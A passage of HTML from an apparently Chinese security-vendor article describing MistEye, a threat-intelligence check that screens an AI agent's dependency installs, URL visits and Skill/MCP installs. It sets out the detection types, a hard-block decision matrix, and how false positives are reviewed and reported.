requirements.txt、package.json、go.mod、Cargo.toml 等依赖声明文件，对每一个依赖项进行供应链包直查</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">域名/URL 访问前检测</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">AI 代理访问任何外部链接前</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对目标域名、URL、IP 地址进行实时威胁情报匹配</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Skill/MCP 安装前检测</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安装第三方 Skill 或 MCP 前</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">递归扫描目标 Skill/MCP 的依赖声明，执行全量依赖检测</span></span></p></td></tr></tbody></table><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.2 支持检测类型</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 检测 API 目前覆盖 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">15 种检测类型</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，分为三大类：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">网络与身份类：</span></span></b></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ip、ip:port、domain、url、email</span></span></b></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">文件哈希类：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">file_hash、md5、sha1、sha256</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">供应链包类：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">package:npm、package:pypi、package:nuget、package:rubygems、package:go、package:cratesio</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.4104903078677309" data-type="png" data-w="877" height="173" style="margin-left: 0px;margin-top: 0px;" width="421" data-imgfileid="100021241" src="https://wechat2rss.xlab.app/img-proxy/?k=d2b7f4d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIV68eywDjY3sicNHP5IUiaFvtriay2GzglaG9qF0kpON3JukSK91nibQgdw10eoLr3gzV0skqGTDGZuOWH8QysAHOr8iaJxxLjANek%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.3 阻断决策矩阵</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测结果遵循严格的阻断规则，不存在&#34;灰色地带&#34;：</span></span></b></p><table><tbody><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">API 响应</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">判定结果</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">处理方式</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">safe=true 且 matches=[]</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">放行（附带风险提示）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">safe=false 或 matches.length &gt; 0</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意命中</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬阻断</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">error</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">检测异常</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬阻断</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（检测不完整）</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">no_check</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">未检测</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬阻断</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（检测不完整</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）</span></span></p></td></tr></tbody></table><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">当检测结果为&#34;未检测&#34;或&#34;检测异常&#34;时，系统默认执行硬阻断策略，确保不会因 API 不可用而产生安全盲区。</span></span></b></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.4 阻断后的处理与误报反馈</span></span></b></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">硬阻断不代表&#34;无路可走&#34;。MistEye 在阻断时会完整输出检测证据（命中 IOC 类型、匹配详情、威胁标签），让用户了解</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为什么被阻断</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如果你认为某次阻断属于误报，可通过以下方式处理：</span></span></b></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">人工复核跳过</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：开发者在确认安全后可以手动执行被阻断的命令（如直接运行 pip install）。MistEye 的门禁逻辑运行在 AI 代理层面，不修改系统级包管理器，不会形成永久锁死。</span></span></b></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">误报反馈</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：通过慢雾安全团队的官方渠道（微信公众号、GitHub Issues）提交误报信息，团队会对威胁情报库进行修正。</span></span></b></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">精确阻断，非全站封禁</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：MistEye 的阻断粒度到具体</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依赖项</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">或</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">域名</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，不会因一个依赖检出风险就阻止项目中所有其他依赖的安装，也不会影响无关的 AI 代理操作。</span></span></b></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages 